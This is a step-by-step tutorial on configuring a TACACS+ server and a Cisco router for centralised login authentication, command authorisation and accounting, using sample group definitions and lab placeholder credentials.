1 | <p></p> |
---|
2 | <h1 id="getting-the-tacacs-server-configured"><a href="#getting-the-tacacs-server-configured"><span class="header-section-number">1</span> getting the tacacs+ server configured</a></h1> |
---|
3 | <pre><code>$ sudo apt-get install tacacs+ |
---|
4 | $ sudo groupadd -r cisco |
---|
5 | $ sudo vi /etc/tacacs+/tac_plus.conf</code></pre> |
---|
6 | <h2 id="change-the-following-settings"><a href="#change-the-following-settings"><span class="header-section-number">1.1</span> change the following settings</a></h2> |
---|
7 | <ul> |
---|
8 | <li>we want to set the shared key for routers who want to use our service to TacacsPassword</li> |
---|
9 | <li>We also want to limit access for users based on groups. For this example we will use settings in tac_plus.conf</li> |
---|
10 | </ul> |
---|
11 | <h2 id="change-this-line"><a href="#change-this-line"><span class="header-section-number">1.2</span> change this line</a></h2> |
---|
12 | <pre><code>key = TacacsPassword</code></pre> |
---|
13 | <p>In the real world we'd choose a much stronger shared key e.g.</p> |
---|
14 | <pre><code>$ pwgen -s 64 1 |
---|
15 | BRSWUWgJLkuxyqfmwfrlRC8JW54bpm3a2rMEe1IWwwpupwGBreGCXGTdbqkMGo2F</code></pre> |
---|
16 | <h2 id="then-at-the-end-of-the-file-....-add"><a href="#then-at-the-end-of-the-file-....-add"><span class="header-section-number">1.3</span> ... then at the end of the file .... add:</a></h2> |
---|
17 | <pre><code># |
---|
18 | # "level 2" users who cannot "debug" or "config" |
---|
19 | # |
---|
20 | group = l2_tacacs_users { |
---|
21 | default service = permit |
---|
22 | login = file /etc/passwd |
---|
23 | enable = file /etc/passwd |
---|
24 | service = exec { |
---|
25 | priv-lvl = 15 |
---|
26 | } |
---|
27 | cmd = configure { |
---|
28 | deny "." |
---|
29 | } |
---|
30 | cmd = debug { |
---|
31 | deny "." |
---|
32 | } |
---|
33 | } |
---|
34 | # |
---|
35 | # "level 2" users with full privileges |
---|
36 | # |
---|
37 | group = netops { |
---|
38 | default service = permit |
---|
39 | login = file /etc/passwd |
---|
40 | enable = file /etc/passwd |
---|
41 | service = exec { |
---|
42 | priv-lvl = 15 |
---|
43 | } |
---|
44 | } |
---|
45 | # |
---|
46 | # group member with entry in password fileapt- |
---|
47 | # |
---|
48 | user = sysadm { |
---|
49 | member = netops |
---|
50 | } |
---|
51 | # |
---|
52 | # group member not in password file |
---|
53 | # use tac_pwd command to encode password |
---|
54 | # |
---|
55 | user = rancid { |
---|
56 | member = netops |
---|
57 | login = des GAxtUcNh5DBFQ |
---|
58 | }</code></pre> |
---|
59 | <h3 id="check-tacacs_plus-config"><a href="#check-tacacs_plus-config"><span class="header-section-number">1.3.1</span> check tacacs_plus config</a></h3> |
---|
60 | <pre><code>$ sudo service tacacs_plus check</code></pre> |
---|
61 | <p>You should see a response like:</p> |
---|
62 | <pre><code> * Checking TACACS+ authentication daemon configuration files successful tacacs+</code></pre> |
---|
63 | <h3 id="restart-tacacs_plus-to-pick-up-the-new-settings"><a href="#restart-tacacs_plus-to-pick-up-the-new-settings"><span class="header-section-number">1.3.2</span> restart tacacs_plus to pick up the new settings</a></h3> |
---|
64 | <pre><code>$ sudo service tacacs_plus restart</code></pre> |
---|
65 | <h1 id="getting-a-cisco-device-to-talk-to-your-tacacs"><a href="#getting-a-cisco-device-to-talk-to-your-tacacs"><span class="header-section-number">2</span> getting a cisco device to talk to your tacacs</a></h1> |
---|
66 | <p>Enter configuration mode:</p> |
---|
67 | <pre><code>tacacs-server host 10.10.9.1 |
---|
68 | tacacs-server key TacacsPassword</code></pre> |
---|
69 | <p>(Later versions of IOS (15...)have an alternative mechanism for defining these parameters but this can be used on all systems for now.)</p> |
---|
70 | <p>Check that you can reach the tacacs server and authenticate correctly:</p> |
---|
71 | <pre><code>test aaa group tacacs+ sysadm <password> port 49 legacy</code></pre> |
---|
72 | <p>You should see a response like:</p> |
---|
73 | <pre><code>Attempting authentication test to server-group tacacs+ using tacacs+ |
---|
74 | User was successfully authenticated.</code></pre> |
---|
75 | <h2 id="now-you-can-finish-configuring-the-router-to-use-tacacs-for-login-control"><a href="#now-you-can-finish-configuring-the-router-to-use-tacacs-for-login-control"><span class="header-section-number">2.1</span> Now you can finish configuring the router to use tacacs for login control:</a></h2> |
---|
76 | <pre><code>aaa new-model |
---|
77 | |
---|
78 | aaa authentication login default group tacacs+ enable |
---|
79 | aaa authentication login NSRCCONSOLE local-case |
---|
80 | aaa authentication enable default group tacacs+ enable |
---|
81 | aaa authorization exec default group tacacs+ none |
---|
82 | aaa accounting delay-start |
---|
83 | aaa accounting exec default start-stop group tacacs+ |
---|
84 | aaa accounting commands 15 default start-stop group tacacs+ |
---|
85 | |
---|
86 | ! This lets us login via the console even if tacacs isn't working |
---|
87 | username NSRCCONSOLE password 0 tpyPo9dT |
---|
88 | line con 0 |
---|
89 | exec-timeout 15 0 |
---|
90 | login authentication NSRCCONSOLE</code></pre> |
---|
91 | <h2 id="now-you-can-verify-accounting"><a href="#now-you-can-verify-accounting"><span class="header-section-number">2.2</span> Now you can verify accounting</a></h2> |
---|
92 | <pre><code>Router#show aaa sessions |
---|
93 | Router#show aaa users all</code></pre> |
---|